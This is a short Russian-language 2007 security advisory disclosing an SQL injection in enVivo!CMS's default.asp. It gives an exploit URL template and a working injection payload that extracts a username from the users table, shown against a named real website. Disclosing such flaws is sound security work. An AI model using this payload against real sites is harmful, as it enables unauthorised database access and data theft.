SQL-инъекция в enVivo!CMS

2007-07-06T00:00:00
ID SECURITYVULNS:DOC:17425
Type securityvulns
Reporter Securityvulns
Modified 2007-07-06T00:00:00

Description

Здравствуйте, 3APA3A.

Software: enVivo!CMS Vendor: www.envivosoft.com
Vulnerability: SQL-инъекция Risk: высокий Date: 6.07.2007 discovered by durito [damagelab] -durito[at]mail[dot]ru- HTTP: durito.narod.ru www.damagelab.org

+~~~:| Details |:

SQL-инъекция в скрипте default.asp

+~~~:| Экплойт |:

http://www.target.com/default.asp?action=article&ID=[SQL]

+~~~:| Пример |:

http://www.foster-adopt.org/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--

-- С уважением, durito [NGH Group] mailto:durito@mail.ru http://durito.narod.ru http://ngh.void.ru